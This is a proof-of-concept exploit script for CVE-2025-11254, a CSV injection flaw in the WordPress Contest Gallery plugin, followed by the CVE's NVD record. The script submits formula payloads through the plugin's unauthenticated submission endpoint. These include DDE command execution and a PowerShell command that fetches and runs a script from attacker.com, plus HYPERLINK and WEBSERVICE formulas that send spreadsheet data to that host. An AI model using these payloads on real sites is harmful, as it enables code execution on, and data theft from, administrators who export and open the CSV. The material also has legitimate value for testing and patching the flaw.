CVE-2025-11254

# CVE-2025-11254 - Contest Gallery CSV Injection PoC # Attackers inject malicious formulas via gallery submission fields # (e.g., contestant name, description, comment fields) import requests TARGET_URL = "https://target-wordpress-site.com" # The Contest Gallery plugin typically exposes a submission endpoint # The exact endpoint varies based on gallery configuration SUBMIT_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Malicious CSV injection payloads # These will be embedded into exported CSV files and executed when opened in Excel/LibreOffice PAYLOADS = [ # Windows command execution via DDE in Excel '=cmd|\"/c calc.exe\"!A1', # PowerShell reverse shell (example) '=cmd|\"/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\"http://attacker.com/shell.ps1\")\"!A1', # Data exfiltration via HYPERLINK '=HYPERLINK("http://attacker.com/exfil?data="&A1, "Click for results")', # Data exfiltration via WEBSERVICE (LibreOffice) '=WEBSERVICE("http://attacker.com/exfil?"&A1)', # Alternative formula triggers '+cmd|\"/c calc\"!A1', '@SUM(1+1)*cmd|\"/c calc\"!A1', ] def inject_csv_payload(gallery_id, field_name, payload): """ Submit a malicious payload through the Contest Gallery submission form. The payload will be stored in the database and later exported to CSV. """ data = { "action": "cg_submit_gallery", # Plugin-specific action "cg_gallery_id": gallery_id, "cg_upload": "1", field_name: payload, # Inject into a text field like name/description } response = requests.post(SUBMIT_ENDPOINT, data=data) return response # Example usage: inject payload into contestant name field # gallery_id should be replaced with a valid gallery ID from the target site for payload in PAYLOADS: result = inject_csv_payload(gallery_id="1", field_name="cg_name", payload=payload) print(f"Payload submitted: {payload[:50]}... | Status: {result.status_code}") # After submission, when an admin exports gallery data as CSV, # the malicious formulas will be embedded in the exported file. # Opening the CSV in Excel/LibreOffice triggers code execution.

{"cve": {"id": "CVE-2025-11254", "sourceIdentifier": "[email protected]", "published": "2025-10-11T09:15:32.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Contest Gallery – Upload, Vote & Sell with PayPal and Stripe plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 27.0.3 via gallery submissions. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3375891/contest-gallery/tags/28.0.0/functions/backend/render/cg-backend-gallery-general.php?old=3372123&old_path=contest-gallery%2Ftags%2F27.0.3%2Ffunctions%2Fbackend%2Frender%2Fcg-backend-gallery-general.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=/contest-gallery/tags/27.0.3&new_path=/contest-gallery/tags/28.0.0&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a0dc62c-786d-40f3-b9c9-bd199a176192?source=cve", "source": "[email protected]"}]}}